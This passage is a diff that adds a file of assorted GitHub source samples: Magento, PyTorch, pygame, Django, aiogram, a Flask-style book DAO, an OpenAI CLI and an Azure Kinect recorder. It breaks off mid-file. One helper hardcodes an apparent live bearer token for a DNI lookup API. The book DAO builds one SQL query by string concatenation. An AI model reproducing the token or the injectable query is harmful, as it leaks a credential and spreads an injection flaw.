diff --git "a/4651.jsonl" "b/4651.jsonl" new file mode 100644--- /dev/null +++ "b/4651.jsonl" @@ -0,0 +1,615 @@ +{"seq_id":"41680908323","text":"import logging\nimport requests\n\nimport ma.utility\nimport ma.exceptions\nimport ma.api.base_class\nimport ma.config.maintenance\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass MaintenanceApi(ma.api.base_class.Api):\n def __init__(self):\n self.__mst = ma.config.maintenance.MAGENTO_SECURITY_TOKEN\n if self.__mst is None:\n raise ma.exceptions.MissingSecurityTokenError(\"Maintenance\")\n\n self.__mmu = ma.config.maintenance.MAGENTO_MAINTENANCE_URL\n self.__mct = ma.config.maintenance.MAGENTO_CACHE_TYPES\n self.__mit = ma.config.maintenance.MAGENTO_INDEX_TYPES\n\n def __get_matching_entries(self, d, l):\n \"\"\" Returns all the dictionary entries as a tuple\n based on the matching keys from the passed list\n \"\"\"\n\n # defaults to all entries when nothing to match.\n # Used as flag to process the entire set.\n if l is None:\n return d.items()\n\n return ma.utility.match_dict_keys_from_list(d, l)\n\n def refresh_cache(self, cache_types=None):\n entries = self.__get_matching_entries(\n self.__mct,\n cache_types)\n\n for (k, desc) in entries:\n url = self.__mmu['cache'].format(k, self.__mst)\n r = requests.get(url)\n\n if r.status_code == requests.codes.ok:\n _LOGGER.info(\"Cache Refresh [%s]: %s\", k, desc)\n else:\n _LOGGER.warning(\"Unable to refresh cache: [%s]\", k)\n\n def reindex(self, index_types=None):\n entries = self.__get_matching_entries(\n self.__mit,\n index_types)\n\n for (k, desc) in entries:\n url = self.__mmu['index'].format(k, self.__mst)\n r = requests.get(url)\n\n if r.status_code == requests.codes.ok:\n _LOGGER.info(\"Re-index [%s]: %s\", k, desc)\n else:\n _LOGGER.warning(\"Unable to reindex: [%s]\", desc)\n","repo_name":"CoffeeForThinkers/MagentoAPI","sub_path":"ma/api/custom/maintenance.py","file_name":"maintenance.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"584543536","text":"import argparse\nimport math\nimport numpy as np\nimport yaml\nfrom pathlib import Path\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom model import DIQANet\nfrom loader import DataInfoLoader, DIQADataset\n# pytorch ignite engine\nfrom ignite.engine import create_supervised_trainer, create_supervised_evaluator, Events\nfrom ignite.metrics.metric import Metric\nfrom sklearn.metrics import mean_squared_error\n\n\ndef ensure_dir(path):\n p = Path(path)\n if not p.exists():\n p.mkdir()\n\n\ndef loss_fn(y_pred, y):\n return F.l1_loss(y_pred, y)\n\n\ndef get_data_loaders(dataset_name, config, train_batch_size):\n data_info = DataInfoLoader(dataset_name, config)\n img_num = data_info.img_num\n index = np.arange(img_num)\n np.random.shuffle(index)\n\n # train, val, test\n train_index = index[0:math.floor(img_num*0.7)]\n val_index = index[math.floor(img_num*0.7): math.floor(img_num*0.9)]\n test_index = index[math.floor(img_num*0.9):]\n\n train_dataset = DIQADataset(dataset_name, config, train_index, status='train')\n train_loader = DataLoader(train_dataset, batch_size=train_batch_size,\n shuffle=True, num_workers=4)\n\n val_dataset = DIQADataset(dataset_name, config, val_index, status='val')\n val_loader = DataLoader(val_dataset)\n\n if config['test_ratio']:\n test_dataset = DIQADataset(dataset_name, config, test_index, status='test')\n test_loader = DataLoader(test_dataset)\n return train_loader, 
val_loader, test_loader\n return train_loader, val_loader\n\n\nclass DIQA_Performance(Metric):\n def reset(self):\n self.label_pred = []\n self.label = []\n\n def update(self, output):\n y_pred, y = output\n self.label_pred.append(torch.mean(y_pred))\n self.label.append(y)\n\n def compute(self):\n y_pred = np.reshape(np.asarray(self.label_pred), (-1,))\n y = np.reshape(np.asarray(self.label), (-1,))\n # y_pred = np.array(self.label_pred)\n # y = np.array(self.label)\n # rmse = np.sqrt(((y_pred - y) ** 2).mean(axis=None))\n rmse = mean_squared_error(y, y_pred, squared=False)\n return rmse\n\n\nclass Solver:\n def __init__(self):\n self.model = DIQANet()\n\n def run(self, dataset_name, train_batch_size, epochs, lr, weight_decay, config, trained_model_file):\n if config['test_ratio']:\n train_loader, val_loader, test_loader = get_data_loaders(dataset_name, config, train_batch_size)\n else:\n train_loader, val_loader = get_data_loaders(dataset_name, config, train_batch_size)\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n self.model = self.model.to(device)\n optimizer = torch.optim.Adam(self.model.parameters(), lr=lr, weight_decay=weight_decay)\n global best_criterion\n best_criterion = -1\n trainer = create_supervised_trainer(self.model, optimizer, loss_fn, device=device)\n evaluator = create_supervised_evaluator(self.model, metrics={'performance': DIQA_Performance()}, device=device)\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_result(engine):\n evaluator.run(val_loader)\n metrics = evaluator.state.metrics\n rmse = metrics['performance']\n print('Validation result: -Epoch: {} RMSE: {:.4f}'.format(engine.state.epoch, rmse))\n global best_criterion\n global best_epoch\n # if rmse > best_criterion:\n # best_criterion = rmse\n best_epoch = engine.state.epoch\n print('epoch:', best_epoch)\n torch.save(self.model.state_dict(), trained_model_file)\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_testing_result(engine):\n if config['test_ratio'] > 0 and config['test_during_training']:\n evaluator.run(test_loader)\n metrics = evaluator.state.metrics\n rmse = metrics['performance']\n print('Test result: -Epoch: {} RMSE: {:.4f}'.format(engine.state.epoch, rmse))\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def final_testing_result(engine):\n if config['test_ratio'] > 0:\n self.model.load_state_dict(torch.load(trained_model_file))\n evaluator.run(test_loader)\n metrics = evaluator.state.metrics\n rmse = metrics['performance']\n global best_epoch\n print('Final test result - Epoch: {} RMSE: {:.4f}'.format(best_epoch, rmse))\n trainer.run(train_loader, max_epochs=epochs)\n\n\nif __name__ == '__main__':\n import os\n parser = argparse.ArgumentParser(description='Pytorch DIQA model')\n parser.add_argument('--batch_size', type=int, default=32, help='batch size training')\n parser.add_argument('--epochs', type=int, default=100, help='epoch training')\n parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')\n parser.add_argument('--decay', type=float, default=0.0, help='weight decay')\n parser.add_argument('--opt', type=str, default='Adam', help='optimizer')\n parser.add_argument('--config', type=str, default='config.yaml', help='config file')\n parser.add_argument('--ds_name', type=str, default='bill', help='name of dataset')\n parser.add_argument('--pretrained', type=str, default='../weights/', help='load pretrained model')\n parser.add_argument('--saved', type=str, default='saved/', help='path to save model')\n args = parser.parse_args()\n with 
open(args.config) as f:\n config = yaml.load(f)\n ensure_dir(args.pretrained)\n ensure_dir(args.saved)\n trained_model_file = os.path.join(args.pretrained, 'DIQA-{}-lr={}.pth'.format(args.ds_name, args.lr))\n dataset_name = 'bill'\n solver = Solver()\n solver.run(dataset_name, args.batch_size, args.epochs, args.lr, args.decay, config,\n trained_model_file)\n \"\"\"\n python train_recognition.py --batch_size 32 --epochs 100\n \"\"\"","repo_name":"cuongngm/IQA_IE_receipt","sub_path":"task1_diqa/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"3333581042","text":"import time\nimport board\nimport busio\nimport usb_hid\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.consumer_control import ConsumerControl\nfrom ch559 import Ch559\n\n# NOTE - make sure these pins are up-to-date for your setup!\nuart = busio.UART(board.D6, board.D7, baudrate=400000)\n\ntime.sleep(1) # Sleep for a bit to avoid a race condition on some systems\n\n# we're just going to forward on keyboard events - a clean passthrough\nkeyboard = Keyboard(usb_hid.devices)\nconsumer_ctrl = ConsumerControl(usb_hid.devices)\n\nch559 = Ch559(uart)\n\nwhile True:\n event = ch559.poll()\n if event is not None:\n new_keys = event.get(\"keys_added\")\n if new_keys is not None:\n for k in new_keys:\n keyboard.press(k)\n old_keys = event.get(\"keys_removed\")\n if old_keys is not None:\n for rk in old_keys:\n keyboard.release(rk)\n cc = event.get(\"consumer_ctrl_clicked\")\n if cc is not None:\n consumer_ctrl.send(cc)","repo_name":"dupontgu/ch559-circuitpython","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"1335204113","text":"from abc import ABC, abstractmethod\n\nfrom aiogram import Router, Bot\nfrom aiogram.types import InlineKeyboardMarkup, Message\n\n\nclass BaseRouter(ABC):\n router: Router = None\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.router = Router()\n\n @abstractmethod\n def get_router(self) -> Router:\n pass\n\n async def send_message(\n self,\n message: str,\n chat_id: int,\n reply_id: int = None,\n silent: bool = True,\n photo_url: str = None,\n show_typing: bool = False,\n buttons: InlineKeyboardMarkup = None\n ) -> Message:\n if show_typing:\n await self.bot.send_chat_action(chat_id, 'typing')\n\n if photo_url is not None:\n return await self.bot.send_photo(\n chat_id,\n photo_url,\n caption=message,\n reply_to_message_id=reply_id,\n disable_notification=silent,\n reply_markup=buttons\n )\n\n return await self.bot.send_message(\n chat_id,\n message,\n reply_to_message_id=reply_id,\n disable_notification=silent,\n reply_markup=buttons\n )\n","repo_name":"pkarpovich/little-turtle","sub_path":"little_turtle/handlers/routers/base_router.py","file_name":"base_router.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16277430642","text":"\"\"\"tp URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\n\nfrom ctfm.views import auth, login, index, dashboard, testing, \\\n get_process, get_schedule, get_utilization, get_results, \\\n get_reservations, reserve, task_exec, exec_status, notification\n\nurlpatterns = [\n url(r'^index/$', index),\n url(r'^index/dashboard.html/$', dashboard),\n url(r'^index/testing.html/$', testing),\n url(r'^login/$', login),\n url(r'^process/$', get_process),\n url(r'^schedule/$', get_schedule),\n url(r'^utilization/$', get_utilization),\n url(r'^result/$', get_results),\n url(r'^auth/$', auth),\n url(r'^notification/$', notification),\n url(r'^reserve/$', reserve),\n url(r'^reserved/$', get_reservations),\n url(r'^taskExec/$', task_exec),\n url(r'^execStatus/$', exec_status)\n]\n\n","repo_name":"gallopor/fhcts","sub_path":"ctfm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26197496829","text":"from tkinter.tix import WINDOW\nfrom turtle import Screen, window_width\nimport pygame\nimport random\n\npygame.init()\n\nWINDOW_WIDTH = 800\nWINDOW_HEIGHT = 600\nScreen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\npygame.display.set_caption('ImagePuzzle Game')\n\nFPS = 10\nclock = pygame.time.Clock()\n\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nORANGE = (255, 127, 0)\nCRIMSON = (220, 20, 60)\n\n\nimg = random.randint(0, 2)\n\nif(img == 0):\n img = 'elephant.jpg'\nelif(img == 1):\n img = 'image3.jpg'\nelse:\n img = 'IITM.jpg'\n\nbg = pygame.image.load(img)\nbg_rect = bg.get_rect()\nbg_rect.topleft = (0, 0)\n\nbk = pygame.image.load('background.jpg')\n\nfont_title = pygame.font.SysFont(None, 64)\nfont_content = pygame.font.Font(None, 40)\nfont_img = pygame.font.Font(None, 20)\n\ntitle_text = font_title.render('Puzzle Game', True, BLACK)\ntitle_rect = title_text.get_rect()\ntitle_rect.center = (WINDOW_WIDTH // 2, WINDOW_HEIGHT // 2 - 100)\n\nchoose_text = font_content.render('Choose Your Level', True, BLACK)\nchoose_rect = choose_text.get_rect()\nchoose_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 - 20)\n\neasy_text = font_content.render('Press E for Easy', True, BLACK)\neasy_rect = easy_text.get_rect()\neasy_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 + 40)\n\nmedium_text = font_content.render('Press M for Medium', True, BLACK)\nmedium_rect = medium_text.get_rect()\nmedium_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 + 90)\n\nhard_text = font_content.render('Press H for Hard', True, BLACK)\nhard_rect = hard_text.get_rect()\nhard_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 + 140)\n\nimg_text = font_img.render('Hold Tab For Original Image', True, BLACK)\nimg_rect = img_text.get_rect()\nimg_rect.center = (WINDOW_WIDTH - 100, WINDOW_HEIGHT - 20)\n\n\nplay_again_text = font_title.render('play Again?', True, WHITE)\nplay_again_rect = play_again_text.get_rect()\nplay_again_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2)\n\ncontinue_text = font_content.render('press Space', True, WHITE)\ncontinue_rect = continue_text.get_rect()\ncontinue_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 + 50)\n\n\nselected_img = None\nis_game_over = False\nshow_start_screen = True\n\nrows = None\ncols = None\n\ncell_width = None\ncell_height = None\n\ncells = []\n\n\ndef start_game(mode):\n global 
cells, cell_width, cell_height, show_start_screen\n\n rows = mode\n cols = mode\n num_cells = rows * cols\n cell_width = WINDOW_WIDTH // rows\n cell_height = WINDOW_HEIGHT // cols\n\n cell = []\n rand_indexes = list(range(0, num_cells))\n\n for i in range(num_cells):\n x = (i % rows) * cell_width\n y = (i // cols) * cell_height\n rect = pygame.Rect(x, y, cell_width, cell_height)\n rand_pos = random.choice(rand_indexes)\n rand_indexes.remove(rand_pos)\n cells.append({'rect': rect, 'border': WHITE,\n 'order': i, 'pos': rand_pos})\n\n show_start_screen = False\n\n\nrunning = True\nwhile running:\n\n Screen.blit(bk,(0,0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n if event.key == pygame.K_TAB:\n Screen.blit(bg, bg_rect)\n\n if is_game_over:\n keys = pygame.key.get_pressed()\n if keys[pygame.K_SPACE]:\n is_game_over = False\n show_start_screen = True\n\n if show_start_screen:\n keys = pygame.key.get_pressed()\n if keys[pygame.K_e]:\n start_game(3)\n if keys[pygame.K_m]:\n start_game(4)\n if keys[pygame.K_h]:\n start_game(5)\n\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and not is_game_over:\n mouse_pos = pygame.mouse.get_pos()\n\n for cell in cells:\n rect = cell['rect']\n order = cell['order']\n\n if rect.collidepoint(mouse_pos):\n if not selected_img:\n selected_img = cell\n cell['border'] = RED\n else:\n current_img = cell\n if current_img['order'] != selected_img['order']:\n temp = selected_img['pos']\n cells[selected_img['order']\n ]['pos'] = cells[current_img['order']]['pos']\n cells[current_img['order']]['pos'] = temp\n\n cells[selected_img['order']]['border'] = WHITE\n selected_img = None\n\n is_game_over = True\n for cell in cells:\n if cell['order'] != cell['pos']:\n is_game_over = False\n\n if show_start_screen:\n\n Screen.fill(WHITE)\n Screen.blit(bk,(0,0))\n Screen.blit(title_text, title_rect)\n Screen.blit(choose_text, choose_rect)\n Screen.blit(easy_text, easy_rect)\n Screen.blit(medium_text, medium_rect)\n Screen.blit(hard_text, hard_rect)\n\n else:\n\n Screen.fill(WHITE)\n\n if not is_game_over:\n for i, val in enumerate(cells):\n pos = cells[i]['pos']\n img_area = pygame.Rect(\n cells[pos]['rect'].x, cells[pos]['rect'].y, cell_width, cell_height)\n Screen.blit(bg, cells[i]['rect'], img_area)\n pygame.draw.rect(\n Screen, cells[i]['border'], cells[i]['rect'], 1)\n Screen.blit(img_text, img_rect)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_TAB:\n Screen.blit(bg, bg_rect)\n\n else:\n Screen.blit(bg, bg_rect)\n Screen.blit(play_again_text, play_again_rect)\n Screen.blit(continue_text, continue_rect)\n\n pygame.display.update()\n clock.tick(FPS)\npygame.quit()\n","repo_name":"apoorvsingh2314/ImagePuzzle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71152900303","text":"\"\"\"\n\nBookDao class - CRUD operations for the Book resource thru REST\n\n\"\"\"\n\n\nfrom database.db import get_db\n\n\ndef insert_book(title, author, isbn, dop):\n db = get_db()\n cursor = db.cursor()\n statement = \"INSERT INTO books(title, author, isbn, dateOfPublication) VALUES (?, ?, ?, ?)\"\n cursor.execute(statement, [title, author, isbn, dop])\n db.commit()\n return True\n\n\ndef update_book(id, title, author, isbn, dop):\n db = get_db()\n cursor = db.cursor()\n statement = \"UPDATE books 
SET title=?, author=?, isbn=?, dateOfPublication =? WHERE id= ?\"\n cursor.execute(statement, [title, author, isbn, dop, id])\n db.commit()\n return True\n\n\ndef delete_book(bookid):\n db = get_db()\n cursor = db.cursor()\n statement = \"DELETE FROM books WHERE id = ?\"\n cursor.execute(statement, [bookid])\n db.commit()\n return True\n\n\ndef get_by_id(bookid):\n db = get_db()\n cursor = db.cursor()\n statement = \"SELECT id, title, author, isbn, dateOfPublication FROM books WHERE id = ?\"\n cursor.execute(statement, [bookid])\n desc = cursor.description\n column_names = [col[0] for col in desc]\n data = [dict(zip(column_names, row))\n for row in cursor.fetchall()]\n return data\n\n\ndef get_books():\n db = get_db()\n cursor = db.cursor()\n query = \"SELECT id, title, author, isbn, dateOfPublication FROM books\"\n cursor.execute(query)\n desc = cursor.description\n column_names = [col[0] for col in desc]\n data = [dict(zip(column_names, row))\n for row in cursor.fetchall()]\n return data\n\n\ndef get_bookids(ids):\n db = get_db()\n cursor = db.cursor()\n statement = \"SELECT id, title, author, isbn, dateOfPublication FROM books WHERE id IN (\"+str(ids)+\")\"\n cursor.execute(statement)\n desc = cursor.description\n column_names = [col[0] for col in desc]\n data = [dict(zip(column_names, row))\n for row in cursor.fetchall()]\n return data\n\n\ndef get_bookid(title):\n db = get_db()\n cursor = db.cursor()\n statement = \"SELECT id FROM books WHERE title = ?\"\n cursor.execute(statement, [title])\n return cursor.fetchone()\n","repo_name":"codehawkzz/BookWishList","sub_path":"src/book/dao/BookDao.py","file_name":"BookDao.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22631162143","text":"from setuptools import setup, find_packages\nfrom os import path\nfrom io import open\n\n\ndef get_about():\n scope = {}\n with open(\"nautapy/__about__.py\") as fp:\n exec(fp.read(), scope)\n return scope\n\n\ndef get_requirements(env=\"base.txt\"):\n with open(\"requirements/{}\".format(env)) as fd:\n requirements = []\n for line in fd.readlines():\n if line.startswith(\"-r\"):\n _, _env = line.split(\" \", 2)\n requirements += get_requirements(_env.strip())\n else:\n requirements.append(line.strip())\n return requirements\n\n\ndef get_readme():\n \"\"\"\n Get the long description from the README file\n :return:\n \"\"\"\n with open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n return f.read()\n\n\nhere = path.abspath(path.dirname(__file__))\nabout = get_about()\n\nsetup(\n name=about[\"__name__\"],\n version=about[\"__version__\"],\n description=about[\"__description__\"],\n long_description=get_readme(),\n long_description_content_type=\"text/markdown\",\n url=about[\"__url__\"],\n author=about[\"__author__\"],\n author_email=about[\"__email__\"],\n classifiers=[\n \"Topic :: Internet\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\"\n ],\n keywords=\"nauta portal cautivo\",\n packages=find_packages(),\n install_requires=get_requirements(),\n entry_points={\n \"console_scripts\": [about[\"__cli__\"] + \"=nautapy.cli:main\"],\n },\n scripts=[\n 'bin/run-connected',\n ]\n)\n","repo_name":"atscub/nautapy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"47"} +{"seq_id":"35745907443","text":"import os\nimport csv\nimport 
shutil\n\ndef get_images_in_path(rel_path):\n path = os.path.abspath(rel_path)\n files = filter(\n lambda x: os.path.isfile(os.path.join(path, x)),\n os.listdir(path)\n )\n return files\n\nfor filedir in [\"./train/\", \"./test/\"]:\n files = get_images_in_path(filedir)\n with open(os.path.join(filedir, 'labels.txt'), 'wb') as labels_file:\n labels = csv.writer(labels_file, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n for f in files:\n label = 1 if f.split(\"_\")[0] == \"dog\" else 0\n labels.writerow([f, label])\n","repo_name":"kraftp/CS-281-final","sub_path":"data/flickr/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26205943497","text":"import requests\n\n# FORMA DE CONSUMIR UNA BASE DE DATOS DE OTRA BASE DE DATOS\n\ndef consultarDNI(dni):\n base_url = \"https://apiperu.dev/api/\"\n solicitud = requests.get(url=base_url+\"dni/\"+dni, headers={\n \"Content-Type\": \"aplication/json\",\n \"Authorization\": \"Bearer 8389c125f5c44cd4791786ff111992abd840f1128ce626db5a67e18af56a18bb\"\n })\n print(solicitud.status_code)\n print(solicitud.json())\n return solicitud.json()","repo_name":"Jesuscueva/Repo_Backend","sub_path":"Semana_8/veterianria/administracion/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35118147603","text":"N = int(input())\nanswer = 0\nfor t in range(N):\n word = input()\n alpha = dict()\n for i in range(len(word)):\n ascii = ord(word[i]) - 97\n if ascii not in alpha:\n alpha[ascii] = [i]\n else:\n alpha[ascii] += [i]\n\n check = True\n for key, value in alpha.items():\n if len(value) > 1:\n for i in range(len(value) - 1):\n if value[i + 1] - value[i] > 1:\n check = False\n break\n if check:\n answer += 1\n\nprint(answer)\n","repo_name":"Gyusik-Choi/algorithm","sub_path":"baekjoon/1316_그룹 단어 체커/B_1316.py","file_name":"B_1316.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40250675525","text":"# https://www.sololearn.com/learning/1073/2467/5125/1\n\n# Class is a blueprint for similar objects\n# Methods are function ties/ called form an object\n# Every instance in python (int, float, string, list, etc) is an object\n\nclass Number:\n def sum(self):\n return self.a + self.b\n\n\nsumObject1 = Number()\nsumObject1.a = 10\nsumObject1.b = 20\n\ns = sumObject1.sum()\nprint(sumObject1.a)\nprint(sumObject1.b)\nprint(s)\nprint()\n\n\n# Some object of same classes in python may have attributes that\n# other objects (of same class) doesn't have (Eg here below)\n# Such attributes need to be defines externally in the program (not inside the Class)\n# But this work may become tedious for every instance for that class (use constructors)\nsumObject2 = Number()\n# print(sumObject2.a) # error\n# print(sumObject2.b) # error\n\n\n'''\nPascalCase \nEmployeeName -->PascalCase \n\ncamelCase\nisNumeric, isFloatOrInt -->camelCase\n'''\n","repo_name":"devKhush/Python","sub_path":"10-OOPs/01_oops.py","file_name":"01_oops.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29008393566","text":"from shared.src import cybered\n\n\nclass HashingModule(cybered.LessonModule):\n \"\"\"The cybered module configuration for 
the hashing module.\"\"\"\n\n # The name of this app.\n name = \"hashing\"\n\n module_name = \"Hashing and Message Digests\"\n module_base_link = \"hashing/\"\n module_start_link = \"begin/\"\n\n module_description = (\n \"An introduction to message digests and their uses in message authentication and integrity\"\n )\n\n\nclass HashingPageManager(cybered.PageManager):\n page_list = (\n (\"begin\", HashingModule.module_start_link, \"hashing/begin.html\"),\n (\"motivation\", \"motivation/\", \"hashing/motivation.html\"),\n (\"examples_form\", \"examples-input/\", \"hashing/examples_form.html\"),\n (\"examples_results\", \"examples-results/\", \"hashing/examples_results.html\"),\n (\"keyed_examples_form\", \"keyed-examples-input/\", \"hashing/keyed_hashes_form.html\"),\n (\"keyed_examples_results\", \"keyed-examples-results\", \"hashing/keyed_hashes_results.html\"),\n (\"conclusions\", \"conclusions/\", \"hashing/conclusion.html\"),\n (\"tools\", \"tools/\", \"hashing/tools.html\"),\n )\n","repo_name":"Notgnoshi/cybersec-project","sub_path":"cybered/hashing/src/hashing.py","file_name":"hashing.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6621196822","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport openai\nimport logging\nfrom rich.markdown import Markdown\nfrom rich import print as rprint\nfrom halo import Halo\n\n# Setup logging based on environment variable\nlog_level = os.environ.get(\"LOG_LEVEL\", \"WARNING\").upper()\nlogging.basicConfig(level=getattr(logging, log_level))\n\n# Read OpenAI API key from environment variable\napi_key = os.environ.get(\"OPENAI_API_KEY\")\nif not api_key:\n logging.error(\"OPENAI_API_KEY environment variable not set.\")\n exit(1)\n\nopenai.api_key = api_key\n\n# App version\nAPP_VERSION = \"0.7.0\"\n\ndef call_openai_api(question):\n try:\n LATEST_STABLE_MODEL = \"gpt-4\"\n MODEL = \"gpt-4-1106-preview\"\n messages = [{\"role\": \"user\", \"content\": question}]\n \n # Make API call\n with Halo(text='Waiting for response...', spinner='dots'):\n response = openai.ChatCompletion.create(\n model=MODEL,\n messages=messages,\n temperature=0,\n )\n return response['choices'][0]['message']['content']\n except Exception as e:\n logging.error(f\"API call failed: {e}\")\n return None\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n logging.error(\"No query string provided.\")\n exit(1)\n\n # Get user input from command line argument\n arg = sys.argv[1]\n\n if arg == \"--version\":\n print(f\"App version: {APP_VERSION}\")\n exit(0)\n else:\n logging.info(f\"Received input: {arg}\")\n\n # Call OpenAI API\n response = call_openai_api(arg)\n\n # Output response or failure message\n if response:\n markdown_response = Markdown(response)\n rprint(\"Assistant says:\", markdown_response)\n else:\n print(\"Failed to get a response.\")\n\n","repo_name":"cdemers/question","sub_path":"question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"34272691215","text":"import cv2\nimport pyk4a\nimport threading\nfrom time import time\nimport tkinter as tki\nfrom PIL import Image,ImageTk\nfrom playsound import playsound\nfrom pyk4a import PyK4ARecord,ImageFormat\nfrom common.helpers import convert_to_bgra_if_required,colorize\n\nclass AzureRecorder():\n\t\n\tdef 
__init__(self,capture,config,output,color,count):\n\t\t\n\t\tself.flag_record = False\n\t\t# ========================================================================================================\n\t\tself.cap = capture\n\t\tself.config = config\n\t\tself.color = color\n\t\tself.count = count\n\t\tself.outpath = output\n\t\tself.record = None\n\t\tself.rgb = None\n\t\tself.depth = None\n\t\tself.frame = None\n\t\tself.thread = None\n\t\tself.stop_event = None\n\t\tself.start = None\n\t\tself.root = tki.Tk()\n\t\tself.rgb_panel = None\n\t\tself.depth_panel = None\n\n\t\tbtn = tki.Button(self.root, text=\"Start recording\",command=self.start_callback)\n\t\tbtn.pack(side=\"bottom\",fill=\"both\",expand=\"yes\",padx=10,pady=10)\n\n\t\tstop_btn = tki.Button(self.root, text=\"Stop recording\",command=self.stop_callback)\n\t\tstop_btn.pack(side=\"bottom\",fill=\"both\",expand=\"yes\",padx=10,pady=10)\n\t\t# ========================================================================================================\n\t\t\n\t\tself.stop_event = threading.Event()\n\t\tself.thread = threading.Thread(target=self.run,args=())\n\t\tself.thread.start()\n\t\t\n\t\tself.root.wm_title(\"Azure Kinect Recorder\")\n\t\tself.root.wm_protocol(\"WM_DELETE_WINDOW\",self.on_close)\n\t\t\n\t\tif not pyk4a.connected_device_count():\n\t\t\traise RuntimeError('Failed to connect to sensor')\n\t\n\tdef start_callback(self):\n\t\tprint(\"Started recording\")\n\t\ttry:\n\t\t\tplaysound(\"Processor/common/audio/start.mp3\")\n\t\t\tself.record = PyK4ARecord(device=self.cap, config=self.config, path=(self.outpath+ f\"/{self.color}_{self.count}.mkv\"))\n\t\t\tself.flag_record = True\n\t\t\tself.record.create()\n\t\t\tself.start = time()\n\n\t\texcept (RuntimeError, TypeError, NameError) as e:\n\t\t\tprint(\"Can't start recording! :\",e)\n\t\n\tdef stop_callback(self):\n\t\tplaysound(\"Processor/common/audio/stop.mp3\")\n\t\tprint(\"stop recording\")\n\t\tself.flag_record = False\n\t\tself.record.flush()\n\t\tself.record.close()\n\t\tprint(f\"{self.record.captures_count} frames written.\")\n\t\tself.count += 1\n\t\n\tdef run(self):\n\t\ttry:\n\t\t\twhile not self.stop_event.is_set():\n\t\t\t\tself.frame = self.cap.get_capture()\n\t\t\t\tself.rgb = convert_to_bgra_if_required(ImageFormat.COLOR_MJPG,self.frame.color)[:,:,:3]\n\t\t\t\tself.depth = self.frame.transformed_depth\n\n\t\t\t\t#===================================================================================\n\t\t\t\t#\t\t\t\t\t\tNot so elegant way to do this! 
